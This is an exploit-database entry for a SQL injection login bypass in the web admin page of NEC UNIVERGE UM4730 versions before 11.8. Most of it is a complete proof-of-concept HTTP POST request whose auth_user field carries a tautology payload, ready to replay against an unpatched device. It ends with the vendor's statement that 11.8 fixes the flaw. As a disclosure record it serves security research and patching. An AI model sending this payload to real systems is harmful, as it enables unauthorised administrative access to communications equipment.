NEC UNIVERGE UM4730 < 11.8 - SQL Injection

  • Author: b0x41s
    Date: 2017-07-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42353/
  • # Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
    # Vulnerability: SQL injection login bypass
    # Date: 15-12-2016
    # Exploit Author: b0x41s
    # Author web: https://www.xrayit.nl
    # Vendor Homepage: https://www.nec-enterprise.com
    # Category: webapps
    # Version: 11.6.0.31
    # Tested on: Windows server 2008
    
    Description:
    The auth_user parameter is vulnerable to SQL injection.
    The login can be bypassed.
    
    POC:
    POST /admin/index.php HTTP/1.1
    Host: 127.0.0.1
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: https://127.0.0.1/admin/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 105
    Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en

    submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de
    
    Fix answer from vendor:
    The WAC login page is no longer available to SQL injection bypassing authentication. The fix was committed prior to releasing 11.8.